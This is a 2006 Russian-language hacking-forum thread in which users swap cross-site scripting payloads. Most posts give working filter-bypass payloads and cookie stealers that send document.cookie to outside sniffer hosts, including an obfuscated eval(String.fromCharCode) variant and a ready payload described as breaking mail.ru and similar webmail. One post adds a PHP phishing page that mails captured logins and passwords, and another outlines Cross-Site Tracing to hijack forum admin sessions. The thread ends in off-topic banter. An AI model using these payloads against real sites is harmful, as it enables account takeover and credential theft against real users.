Авторские статьи XSS крупным планом.

Discussion in 'Статьи' started by Thesaurus, 16 Dec 2005.

Thread Status:
Not open for further replies.
  1. Humor

    Humor Banned

    Joined:
    26 Jan 2006
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    Мда...СОВСЕМ не факт имхо... :eek:

    Имхо ну для начало вот так,

    HTML:
    <span style='background:url("javascript:alert()");'>wj</span>
    В скобках обязательно нужно писать какие нить данные, ибо это грамматически правильно и тогда тоже будет работать в Фаерфокс. Если же в скобках укажешь пустату, то пустотой у тебя и будет в Фаерфоксе. То есть будет только работать в ИЕ и в Опера, а в Фаерфокс - НЕТ!!!!!! :rolleyes: :confused: :rolleyes:

    Хотя это даже не важно и не является фактом ибо в Фаерфоксе ведь все ровно защита от таких выкрутасываний имхо. :rolleyes:

    А то что кавычки фильтруются, то и это не беда ибо в параметрах (То, что идет после знака равенства) можно кодировать в HTML entities. :rolleyes:

    Используй эту ссылку для шифровки.

    http://ha.ckers.org/xss.html

    В самом низу.

    Кстати и античату не мешало бы сделать что нить такое а то приходится ссылаться на другие классные проекты. Чем мы хуже имхо спрашивается имхо????"!"!"!"!" :eek: :mad: :confused: :rolleyes:

    К примеру это,

    HTML:
    <span style=background:url('javascript:alert(/wj/)')>wj</span>
    
    Будет тоже работать и вот так,

    HTML:
    <span style=background:url('javascript:alert(/wj/)')>wj</span>
     
    #21 Humor, 27 Jan 2006
    Last edited: 27 Jan 2006
  2. slime

    slime New Member

    Joined:
    8 Dec 2005
    Messages:
    30
    Likes Received:
    1
    Reputations:
    -2
    А вот еще вопрос...
    а можно ли как-то проводить активный КСС если у жертвы отключены картинки... я так понимаю background-image уже не пойдет... а onmouseover как-то не совсем надежно....
     
  3. Humor

    Humor Banned

    Joined:
    26 Jan 2006
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    А хе, очень даже интересная тема, что именно работает в плане картинок или что нить такое если картинки отключены. :cool:

    Щас буду тестировать. Я знаю, что вот так,

    HTML:
    <iframe src="javascript:alert(/wj/)">wj</iframe>
    будет работать вне зависимости если браузер ИЕ, ФФ или Опера или если картинки выключены. Тоже, самый лучший способ это использовать функцию onerror=alert(/wj/) которая тоже работает во всех трех браузерах. А насчет картинок думаю протесчу может новое что нить найду.


    В принципе если Джаваскрипт включен а картинки выключены, то это не беда, но мне интересно будет ли работать onerror=alert(/wj/) если картинки отключены. Ведь он будет только работать ПОСЛЕ загрузки картинки и если картинку закачать не удалось, то тогда сработает онеррор....но хотя протесчу посмотрю, что может из этого быть. :cool:
     
    #23 Humor, 28 Jan 2006
    Last edited: 28 Jan 2006
  4. Humor

    Humor Banned

    Joined:
    26 Jan 2006
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    В принципе, вот только что протестил с отключенными картинками в ИЕ,

    вот так

    HTML:
    <img src="javascript:alert(/wj/)">
    не работает, а вот так,


    HTML:
    <img src="javascript:alert(/wj/)">
    <script>onerror=alert(/wj/)</script>
    - Да. :cool:

    Так что если картинки отключены, то это совсем таки не беда. :cool: Это Я типа пример дал. Onerror рулит это мое личное мнение имхо. :cool: Надо просто уметь им пользоваться. :cool:












    EDIT: Но однако опять сделал тест, onerror в этом случае работает не из-за онеррор... :D :D :D

    Ибо так,


    HTML:
    <script>onerror=alert(/wj/)</script>
    Будет тоже работать само по себе. :D

    Ща будем еще думать. :D

    EDIT: Кстати пока искал, понял почему онеррор работает сам по себе. :cool:

    HTML:
    <span style=background:url('javascript:wjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwj=alert(/wj/)')>wj</span>
    Так тоже будет работать в ИЕ. :D

    То есть оказывается не важно, что идет до параметров!
    Они в этом случае становятся наименованиями. :D



    HTML:
    <script>wjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwj=alert(/wj/)</script>

    Кстати если ты отключишь картинки, то ты в принципе их не отключишь, а заблокируешь автоматически закружатся вот.

    HTML:
    <img src="javascript:alert(/wj/)">
    С отключенными картинками в ИЕ, ты приведешь браузер ИЕ в состояние ФФ! То есть если правой кнопкой мыши нажмешь на "view image" алерт появится! Это состояние является включенным по умолчанию в браузере Фаерфокс. :cool:

    EDIT:

    Кстати еще добавлю, что если написать вот так,

    HTML:
    <img src="http://forum.antichat.ru/antichat/pic/logo.gif" onLoad="alert(/wj/)">
    то тоже будет алерт во всех браузерах. То есть если картинка существует.

    Если же она НЕ существует,
    то думаю, что всем понятно и так, что следует писать вот так,


    HTML:
    <img src="http://forum.antichat.ru/antichat/wj/logo.gif" onError="alert(/wj/)">
     
    #24 Humor, 28 Jan 2006
    Last edited: 28 Jan 2006
    1 person likes this.
  5. President Bush

    Joined:
    31 Jan 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    HTML:
    [quote][color=white][email]wj@wj[url=style=display:none;background:url(javascript:document.images[1].src="http://antichat.org/s/antichat.gif?"+document.cookie);][/url].com[/email][/color][/quote]
    HTML:
    [url=http://www.wj.com wj[url=http://www.wj.com style=display:none;background:url('javascript:alert("wj")')  wj]][/url][/url]
    HTML:
    [url=http:// wj[url= style=background:url(javascript:for(;;)open())  wj]][/url][/url]
    HTML:
    [url=http://www.wj.com wj[url=http://www.wj.com style=display:none;background:url('javascript:img=new/**/Image();img.src="http://antichat.org/s/login.gif?"+document.cookie;')  wj]][/url][/url]
    HTML:
    <script>img=new Image();img.src="http://antichat.org/s/login.gif?"+document.cookie;</script>
    Вот такие тоже бывают примеры вот. :rolleyes:


    Это все полезно для новичков чтобы знали как это все выглядит. :rolleyes:


    Мы старые, должны новичком помогать и их обучать вот. :rolleyes:
     
    #25 President Bush, 31 Jan 2006
    Last edited: 31 Jan 2006
  6. Technic

    Technic Banned

    Joined:
    26 Feb 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    HTML:
    <img src=http://www.xss.gif s='"p">'onerror=alert(/wj/) style=visibility:hidden>
    Вот так ломается mail.ru, inbox.ru, bk.ru, list.ru, rambler.ru, и другие, а главное, что работает проверенно в Опере, Фаерфокс и ИЕ. (Сейчас четвертое Марта, 2006 год)

    А вот так ломается инвизион 2.*

    HTML:
    [img]/[snapback]	onerror=alert(/wj/)	[/snapback].gif[/img]
    Где Я поставил табуляции вместо пробелов.

    И обратите внимание, что элемент img, не терпит в своем параметре какого либо пробела чтобы сработала функция onerror! Это можно ТОЛЬКО обойти посредством слеша (/) или точкой с запитой. (;)

    То есть вот так вот,
    Именно из-за пробела в атрибуте src элемента img, в браузере фаерфокс скрипт не сработает! Но за-то вот так вот - сработает.

    HTML:
    <img src="http://www.wj.gif/<a href=" onerror=alert('wj') style="display:none;">
    Или,

    HTML:
    <img src="http://www.wj.gif;<a href=" onerror=alert('wj') style="display:none;">
    И еще, если этот же код написать в Опере, то работать не будет из-за style="display:none;" но это не беда, ибо можно просто написать вот так вот и все везде будет работать, будучи не видимо для пытливых глаз:

    HTML:
    <img src="http://www.wj.gif;<a href=" onerror=alert('wj') style="visibility:hidden">
    Воруем куки...

    HTML:
    <img src=javascript:i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;>


    И еще, иногда обойти фильтры посредством HTML объектов не удается, (w) тогда приходится прибегать к урл кодировки о которой Я еще не нашел, чтобы кто нибудь знал.

    HTML:
    <img src="javascript:alert('wj')">
    Кодируем в урл кодировку,

    HTML:
    <img src="javascript:%61%6C%65%72%74%28%27%77%6A%27%29">
    Честно говорю, что очень мало кто знает об этом способе.... Ну и надо еще знать, что закодировать в урл кодировку можно только после протокола JavaScript и т.д.

    Иногда приходится угнать куки при помощи vbscript, а как это делается? vbscript как Я теперь узнал, не поддерживает способы вызывать браузерам картинки так, как это в состоянии делать JavaScript, (По крайней мере Я таких примеров не встречал и не нашел) но это не беда, поскольку мы можем обходить эту дилемму посредством перехождения с одного протокола на другой.

    HTML:
    <img src=vbscript:window.execScript("img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;")>

    И опять таки, иногда провести onerror() можно, а все параметры как нам на зло фильтруются и идет жуткая фильтрация на HTML объекты и на прочею дребедень. Ну тогда можно прибегнуть к нашему любимому String.fromCharCode()

    <!-- Это нельзя писать произвольно, то большими буквами, то маленькими, то есть вот так, String.FromCharCode() работать у вас не будет. -->

    И так, используем уже готовую ссылку,

    http://ferruh.mavituna.com/stringfromcharcode.asp?

    И кодируем следующую строку.

    HTML:
    document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
    Которая есть ни что иное как код сниффера, который работает к примеру вот так, в таком виде:

    HTML:
    <img src="http://www.badimage.gif" onerror='document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;'>
    
    И получаем следующие:

    Char :
    Ascii :
    JS Code :
    HTML:
    String.fromCharCode(100,111,99,117,109,101,110,116,46,105,109,97,103,101,115,91,48,93,46,115,114,99,61,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,114,117,47,99,103,105,45,98,105,110,47,115,46,106,112,103,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59);
    Ну а теперь применяем наш закодированный вариант, в совокупности функцией eval()

    HTML:
    <img src="http://www.badimage.gif" onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,105,109,97,103,101,115,91,48,93,46,115,114,99,61,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,114,117,47,99,103,105,45,98,105,110,47,115,46,106,112,103,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));>
    Смотрим лог сниффера, http://www.antichat.ru/sniff/log.php

    Если кто нибудь хочет узнать как создавать липовые страницы, то вот Я описал этот метод на этой ссылки.

    http://video.antichat.net/file181.html


    White Jordan.

    Администрация несет полную ответственность за ваши взломы.
     
  7. Technic

    Technic Banned

    Joined:
    26 Feb 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    HTML:
    <img src=http://www.xss.gif s='"p">'onerror=i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie; style=visibility:hidden>
    Просто все хотели готовый код куки воровать на mail.ru так что вот вам. Резвитесь. :cool:



    P.S.

    Чтобы обезопасится от такой атаки, достаточно просто выключить загрузку картинок в своем браузере.

    Но однако не совсем ок, ибо логически можно провести атаку метода Tarce, о котором Я как нить тоже напишу статью.

    Method Trace

    Метод Trace, это такой способ, который позволяет проводить атаку XSS вне зависимости где находится жертва. Как мы все знаем, куки не переходят от одной области в другую, то есть если Я сейчас создам страницу на narod.ru с кодом воровки кук, и тут на античатовском форуме пройдусь по этой ссылки залогинившися при этом в мой аккунт, то мои куки полетят на сниффер от НАРОДА а не от форума античата. С методом трейс однако, это легко обходится. Болие того, если картинки отключены, то тоже реально упереть куки если провести эту атаку, которую можно провести где угодно. Понимайте метод трейс, как метод атаки XSS на WWW в любом месте, в любое время.

    Как узнать если этот метод поддерживается?


    Очень просто, он всегда включен по умолчанию, но можно и проверить написав код или на Джаваскрипт, или же воспользоваться этой ссылкой.

    http://web-sniffer.net/

    Можно ли ломануть античатовский форум этим методом? Да! Реально ли? Да! Убийство ли это времени? О да! +)

    Как? Да очень просто, совсем не обязательно просить или нудить кого нибудь посетить нашу ссылку которая будет воровать куки Админов а то и сессию админской панели, когда это можно сделать в любом месте и сделать чтобы скрипт срабатывал автоматически и без ведо админа, ну к примеру просто послав Админу или кому угодно на античате на мыло к примеру мейл.ру письмо, или туда где админ или наша жертва обитает будь то уязвимый форум, чат т.д. и вместо кода сниффера для мейл.ру, впаять код сниффера для античатовского форума. Так как ИП теперь у нас привязывается к сессии (Кстати это из-за меня +) ) и кук нам не совсем достаточно, то есть два пути:

    1. Или уловить админа и своровать админ-панельские куки, которые можно тут же применить и выполнить с ними собственный скрипт сделав себя админом, или же, узнавать с помощью скрипта мыльники пользователей и их взламывать, что для меня очень легко делать через XSS. Потом можно сделать себе ретрив паролей. +)

    Ну логически будет просто метод трейс отключить так? Ведь все что нужно, так это отключить на античате этот метод и усе.....


    А ведь можно еще и заставить проксю, то есть прокси сервер которым античатовец пользуется, вернуть нам трейс информацию, то есть - его куки. +)

    Короче вот интересная чтива.

    http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf
    http://www.modsecurity.org/archive/amit/xst_strikes_back.txt

    Тут очень все ясно и понятно.
     
    #27 Technic, 3 Mar 2006
    Last edited: 3 Mar 2006
  8. ilyha

    ilyha Elder - Старейшина

    Joined:
    10 Nov 2005
    Messages:
    48
    Likes Received:
    1
    Reputations:
    0
    1 person likes this.
  9. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Молодец wj. А зачем банят не понимаю толку всё равно нету )).
     
  10. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    Wj много из чужих взял
    я так тоже могу завалюсь на сайт америкосов перевду их мысли и сюда сапостю
     
    #30 Tikson, 4 Mar 2006
    Last edited by a moderator: 4 Mar 2006
  11. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Что то ты воще не в тему сказал.
     
  12. Web Giant

    Web Giant Banned

    Joined:
    8 Mar 2006
    Messages:
    9
    Likes Received:
    1
    Reputations:
    -1
    Один из видов воровки кук.

    Кодируем в урл то, что надо и все.

    http://ha.ckers.org/xss.html

    Сам файл.

    PHP:
    <?
    if(isset(
    $_POST['login']) && isset($_POST['passwd'])){
    mail("[email protected]""privet"$_POST['login'].":".$_POST['passwd']);
    header("Location: http://www.antichat.ru/");
    }
    ?>
    Кому надо тот поймет. :rolleyes:
     
    #32 Web Giant, 10 Mar 2006
    Last edited: 10 Mar 2006
  13. Web Giant

    Web Giant Banned

    Joined:
    8 Mar 2006
    Messages:
    9
    Likes Received:
    1
    Reputations:
    -1
    Ссылку дай тех кого Я копирую?

    Если Я на кого нить ссылаюсь, то как ты уже заметил, Я или даю ссылку или говорю автора.

    Все остальное что Я здесь написал, это Я все нашел сам не зависимо от тех, кто это нашел до меня, или же после.

    И ни кого Я не копирую ибо некого и копировать.
     
  14. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    310
    Reputations:
    201
    Ты забил добавить что ты гений :Р
    Эхх, Жорик вернулся...
    [sorry за оффтоп]
     
  15. Web Giant

    Web Giant Banned

    Joined:
    8 Mar 2006
    Messages:
    9
    Likes Received:
    1
    Reputations:
    -1
    Да Я никогда и не уходил если честно. Я всегда был на античате. :rolleyes: Каждый день почти уже год. :rolleyes:
     
    1 person likes this.
  16. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Web Giant, ты вроде бы прошался с нами..не уж-то обманул :(
     
  17. Web Giant

    Web Giant Banned

    Joined:
    8 Mar 2006
    Messages:
    9
    Likes Received:
    1
    Reputations:
    -1
    Так вы же не захотели прощатся? Вот Я и не ушел. Никакого обмана тут нету, вы сами не захотели. :rolleyes:
     
  18. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    да нет.. мы тебя проводили достойно! Загляни в репу и узнаешь -) ток того забаненного..)
    Давай, гений... пора тебе ненадолго свалить чтоль.. не ну без обид! Исчезни плз! Будь другом!
     
  19. Web Giant

    Web Giant Banned

    Joined:
    8 Mar 2006
    Messages:
    9
    Likes Received:
    1
    Reputations:
    -1
    Блин и Англичане просят того же!....мда.....складывается у меня мнение, что Я никому не нужен на интернете.... =(((((((((((((((((((((((((((((((((((((((

    А вот Я уйду да? КТО будет писать тогда Гениальные статьи? КТО будет веселить и смешить народ?
     
  20. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Веселить и смешить народ будет табачок.. у него кстати неплохо получается.. со своими песенками и асталом. За тобой закрепился другой имидж...

    гениальные статьи нынче не в моде..! Их все равно большинство не понимает.
    Ну ты уйди, а там видно будет..

    Девушку себе заведи.. встречайся с ней, люби. На пользу будет.
     
Thread Status:
Not open for further replies.